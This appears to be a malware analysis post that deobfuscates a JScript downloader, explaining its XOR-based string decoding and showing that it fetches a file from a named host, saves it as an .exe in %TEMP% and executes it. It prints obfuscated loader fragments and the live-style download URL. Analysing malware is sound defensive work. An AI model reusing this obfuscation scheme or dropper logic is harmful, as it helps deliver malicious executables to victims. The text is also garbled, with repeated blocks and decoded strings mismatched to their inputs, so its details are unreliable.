PUKVG="r";
AHIXJ="s";
var ZSGVJ=KPMSMGNMR+SUFPWP+
PXSIR[
MOTJV+IYGPGWZM+WPRSDY+AHIXJ+SOVWR+PUKVG
=> "substr"
]
(HLTHO, 2);
=> get two chars from the string to decode, at the current index
=> (index,2)
=> example with "9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F"
=> FIRST LOOP
=> ZSGVJ= "0x" +first_parameter.substr(index,2)
=> 0x9C hex => 156 decimal
var CMQLHAF=COJSPB ^ VEOSXK;
=> CMQLHAF = 156 XOR 203 = 87 decimal
CEXDQHZJ="C";=> ZSGVJ= "0x9C" => hex value
var COJSPB=parseInt(ZSGVJ); => 0x9C hex => 156 decimal
var CMQLHAF=COJSPB ^ VEOSXK;
=> CMQLHAF = 156 XOR 203 = 87 decimal
LKNKOVFE="d";
MYLRINFXQ="e";
WZFISKGY="r";
MFEYE="a";
OUNLIBUKT="o";
UFRKSQ="h";
QNBCQUK="C";
PDUTMK="m";
KXFXZULVP="r";
OYPESUBQW="o";
SVJHUXA="f";
DISGB+=String[SVJHUXA+KXFXZULVP+OUNLIBUKT+PDUTMK+QNBCQUK+UFRKSQ+MFEYE+WZFISKGY+CEXDQHZJ+OYPESUBQW+LKNKOVFE+MYLRINFXQ](CMQLHAF);
=> String["fromCharCode"](CMQLHAF);
=> DISGB+=String.fromCharCode(CMQLHAF);
=> 87 => "W"
Conclusion :
"9C
A loop retrieving 2 chars for the xor with 203, every 3 chars
With this string as example :
9C => 0x9C => 156 XOR 203 => 87 => W
98 => 0x98 => 152 XOR 203 => 83 => S
A8 => 0xA8 => 168 XOR 203 => 99 => c
B9 => 0xB9 => 185 XOR 203 => 114 => r
etc...
=> "WScript.Shell"
98 => 0x98 => 152 XOR 203 => 83 => S
A8 => 0xA8 => 168 XOR 203 => 99 => c
B9 => 0xB9 => 185 XOR 203 => 114 => r
etc...
Now, we have all the elements to deobfuscate all parts
DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY", VEOSXK)
"Scripting.FileSystemObject"
DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY", VEOSXK);
"expandEnvironmentStrings"
DVUNKGXA("AEJB3YBBMAAAA5NAFA8ENA5BBDOA2BB9PA4CA5PA6CAERA5FBFT98GBFVB9OA2GA5TACHB8U", VEOSXK);
"%TEMP%"
DVUNKGXA("EEO9FC8EQ86E9BREEF", VEOSXK)
"GetTempName"
DVUNKGXA("8CHAEVBFI9FWAEJA6WBBJ85WAAKA6XAEK", VEOSXK);
"WinHttp.WinHttpRequest.5.1"
DVUNKGXA("E5LAEBB3TAES", VEOSXK);
".exe"
DVUNKGXA("A4VBBOAEGA5Z", VEOSXK);
"open"
DVUNKGXA("ACCAEWBFP", VEOSXK);
"get"
DVUNKGXA("A3IBFZBFSBBMF1EE4UE4MA7EA4XBFPA4DAEQA7DA3RA4FBFXB8TE5MBFGA4ZBBSE4LA7GA4UACIE5VBBJA3WBBJF4IADWF6KAECB9UB9RA4LB9HE5AB8SB2KB8B", VEOSXK);
"http: //lotoelhots.top/log.php?f=error.sys"
DVUNKGXA("98CAEVBFN99GAEYBARBEIAEVB8JBFW83JAEXAAKAFYAEMB9Z", VEOSXK);
"SetRequestHeader"
DVUNKGXA("9EGB8TAEHB9UE6H8AZACRAEKA5DBFW", VEOSXK);
"User-Agent"
DVUNKGXA("86WA4FB1YA2RA7JA7BAATE4JFEWE5JFBXEBKE3X9CKA2AA5RAFGA4TBCHB8VEBJ85W9FKEBYFDLE5ZFAMF0ZEBN9FBB9PA2DAFQAEEA5RBFFE4TFCIE5RFBEF0SEBFB9SBDGF1UFAHFAVE5JFBXE2LEBAA7PA2DA0RAEEEBT8CHAEUA8IA0VA4I", VEOSXK);
"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
DVUNKGXA("B8XAEKA5XAFL", VEOSXK);
"send"
DVUNKGXA("8AO8FC84Q8FC89QE5D98RBFFB9SAEFAATA6G", VEOSXK);
"ADODB.Stream"
DVUNKGXA("84JBBWAEJA5X", VEOSXK);
"Open"
DVUNKGXA("9FYB2MBBAAEN", VEOSXK);
"Type" (= 1)
DVUNKGXA("9CPB9CA2QBFDAEQ", VEOSXK);
"Write"
DVUNKGXA("99RAEFB8TBBGA4TA5GB8UAEH89VA4IAFWB2J", VEOSXK);
"ResponseBody"
LAST PART :
UAYPLY = "%TEMP%" + TempName + ".exe"
if (WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B", VEOSXK)](UAYPLY))
"FileExists"
"SaveToFile"
HAZXEJDW[DVUNKGXA("88OA7CA4QB8DAER", VEOSXK)];
"Close"
if (!WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B", VEOSXK)](UAYPLY))
not "FileExists"
"Exec"
3) CONCLUSION :
if (WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B", VEOSXK)](UAYPLY))
"FileExists"
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES", VEOSXK)](UAYPLY);
"DeleteFile"
HAZXEJDW[DVUNKGXA("98ZAAMBDAAEN9FDA4R8DFA2TA7GAEU", VEOSXK)](UAYPLY);"DeleteFile"
"SaveToFile"
HAZXEJDW[DVUNKGXA("88OA7CA4QB8DAER", VEOSXK)];
"Close"
if (!WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B", VEOSXK)](UAYPLY))
not "FileExists"
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES", VEOSXK)](UAYPLY);
"DeleteFile"
ZJFHO[DVUNKGXA("8EVB3OAEHA8Z", VEOSXK)](UAYPLY);"DeleteFile"
"Exec"
Two important functions used :
- one for creating the object passed as a parameter string,
- the second to decode a String with a value (203) for the XOR part.
Summary :
=> Executes a file, downloaded from http: //lotoelhots.top/log.php?f=error.sys and saved to
%TEMP%\RandomTempName.exe
Example :
- one for creating the object passed as a parameter string,
- the second to decode a String with a value (203) for the XOR part.
Summary :
=> Executes a file, downloaded from http: //lotoelhots.top/log.php?f=error.sys and saved to
%TEMP%\RandomTempName.exe
Example :
C:\Users\DardiM\AppData\Local\Temp\rad1083E.tmp.exe
Payload :
6/57
https://www.virustotal.com/en/file/...775565ecf3d57bee898bdbba7ed0fcf0dee/analysis/
N.B.: I retrieved the payload before the URL became "unavailable" (type : binary)
https://www.virustotal.com/en/file/...775565ecf3d57bee898bdbba7ed0fcf0dee/analysis/
N.B.: I retrieved the payload before the URL became "unavailable" (type : binary)